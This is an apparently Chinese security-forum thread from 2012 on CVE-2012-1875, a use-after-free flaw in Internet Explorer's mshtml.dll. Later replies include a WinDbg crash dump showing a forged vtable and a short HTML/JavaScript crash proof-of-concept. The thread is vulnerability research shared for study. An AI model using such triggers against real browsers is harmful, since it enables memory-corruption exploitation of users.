首页
社区
课程
招聘
[原创]CVE-2012-1875:mshtml.dll Use-After-Free漏洞分析
发表于: 2012-6-17 23:13 10608

[原创]CVE-2012-1875:mshtml.dll Use-After-Free漏洞分析

2012-6-17 23:13
10608

挖洞这种同时考验内功和人品的事儿,对我来说还是太强人所难,所以我只能捡点纯体力劳动干干,趁自己还年轻,有膀子力气
调试了一番外国友人提供的POC,写了一点自己的理解和大家分享。文中纰漏之处,恳请各位看官斧正


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 6
支持
分享
最新回复 (19)
雪    币: 1489
活跃值: (1053)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
2
膜拜楼主的调试功底。
2012-6-18 11:03
0
雪    币: 94
活跃值: (25)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
mark,先顶后看
2012-6-18 12:03
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
4
不错,下载学习下
2012-6-18 13:42
0
雪    币: 217
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
看看先,厉害的人还是蛮多的
2012-6-18 15:45
0
雪    币: 72
活跃值: (25)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
6
看作者的调试文档很给力,但是我重现场景不能触发呢?
用文档中修改后的POC,貌似IE没加载mshtml模块啊??
2012-6-18 16:31
0
雪    币: 70
活跃值: (74)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
7
K.K的功力越来越深
2012-6-19 11:25
0
雪    币: 435
活跃值: (1282)
能力值: ( LV13,RANK:388 )
在线值:
发帖
回帖
粉丝
8
下载学习 谢谢分享
2012-6-20 14:26
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
9
KK熟悉IE解析html的过程啊,求学习资料,各种函数调用这些,或者api文档,求科普
2012-6-20 23:38
0
雪    币: 78
活跃值: (85)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
10
IE 5 源码 + 符号 + IDA NAME搜索html各种关键字 + 各种推测
2012-6-23 13:39
0
雪    币: 180
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
学习了,支持楼主
2012-6-23 18:57
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
12
thx................
2012-6-23 19:07
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
感谢楼主分享。什么好东东啊?
2012-6-25 15:34
0
雪    币: 2015
活跃值: (902)
能力值: ( LV12,RANK:1000 )
在线值:
发帖
回帖
粉丝
14
100台电脑有几台能测试成功啊?这个版本的dll还能找到吗?抽象贴
2012-6-25 15:40
0
雪    币: 435
活跃值: (1282)
能力值: ( LV13,RANK:388 )
在线值:
发帖
回帖
粉丝
15
不会吧
ie8很稳定重现啊
风水也很好 命中稳定
访问异常就是伪造的 vtable 1c1c1c7c
 (720.c68): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1c1c1c0c ebx=00000000 ecx=00321668 edx=00000001 esi=00321668 edi=0208b7c0
eip=68dbc402 esp=0208b758 ebp=0208b764 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CElement::Doc+0x2:
68dbc402 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:1c1c1c7c=????????
0:005> uf mshtml!CElement::Doc
mshtml!CElement::Doc:
68dbc400 8b01            mov     eax,dword ptr [ecx]
68dbc402 8b5070          mov     edx,dword ptr [eax+70h]
68dbc405 ffd2            call    edx
68dbc407 8b400c          mov     eax,dword ptr [eax+0Ch]
68dbc40a c3              ret
2012-6-25 19:43
0
雪    币: 435
活跃值: (1282)
能力值: ( LV13,RANK:388 )
在线值:
发帖
回帖
粉丝
16
发个简化版 crash poc
<DIV id=testfaild>
	<img id="imgTest">
	<div id="imgTest"></div>
	<input id="4B5F5F4B" onMouseOver="crash();"></input>
</DIV>

<script language="JavaScript">
function crash() {
	eval("imgTest").src = "";
}

function trigger() {
	var x =document.getElementsByTagName("input");
	x[0].fireEvent("onMouseOver");
	testfaild.innerHTML = testfaild.innerHTML;
	x[0].fireEvent("onMouseOver");
}
trigger();
</script>
2012-6-25 19:48
0
雪    币: 2015
活跃值: (902)
能力值: ( LV12,RANK:1000 )
在线值:
发帖
回帖
粉丝
17
请问楼上兄弟你的漏洞模块: mshtml.dll 8.0.6001.19222是在哪里找到的?谢谢
我的IE8:
上传的附件:
2012-6-25 20:25
0
雪    币: 435
活跃值: (1282)
能力值: ( LV13,RANK:388 )
在线值:
发帖
回帖
粉丝
18
[QUOTE=天易love;1082710]请问楼上兄弟你的漏洞模块: mshtml.dll 8.0.6001.19222是在哪里找到的?谢谢
我的IE8:
[/QUOTE]

你的ie版本和楼主的倒是一样
我的ie是for win7的所以版本号是8.0.7600.16385

按说这是个新漏洞 只要近期没升级的低一点的版本 应该都很难幸免
可以windbg附加 跑 看看有没有什么异常
2012-6-25 21:42
0
雪    币: 611
活跃值: (251)
能力值: ( LV12,RANK:390 )
在线值:
发帖
回帖
粉丝
19
我的ie 8 + window xp sp3 en 没重现出来,头大。。。
2012-6-26 16:55
0
雪    币: 201
活跃值: (16)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
20
先顶一个 再学习
2012-7-1 13:23
0
游客
登录 | 注册 方可回帖
返回
//